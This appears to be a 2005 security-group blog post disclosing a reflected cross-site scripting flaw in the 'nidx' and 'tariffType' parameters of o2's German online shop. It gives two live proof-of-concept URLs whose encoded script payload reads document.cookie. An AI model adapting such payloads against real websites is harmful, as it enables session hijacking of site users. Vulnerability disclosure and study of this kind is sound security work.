by r0t,der4444,cembo,VietMafia

Wednesday, December 07, 2005

shop2.o2online.de XSS vuln.

o2 is my favorite mobile phone operator, thats why i checked they website .

Vuln.description.

o2 shop a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "nidx" and "tariffType" parameter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

live examples:


http://shop2.o2online.de/o2/interessenten/
necos/handys/siemens/index.html?nidx=%22%3
E%3Cscript%3Ealert(document.cookie)%3C/
script%3E


http://shop2.o2online.de/o2/interessenten/
necos/handys/siemens/index.html?nidx=6&tar
iffType=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

0 Comments:

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew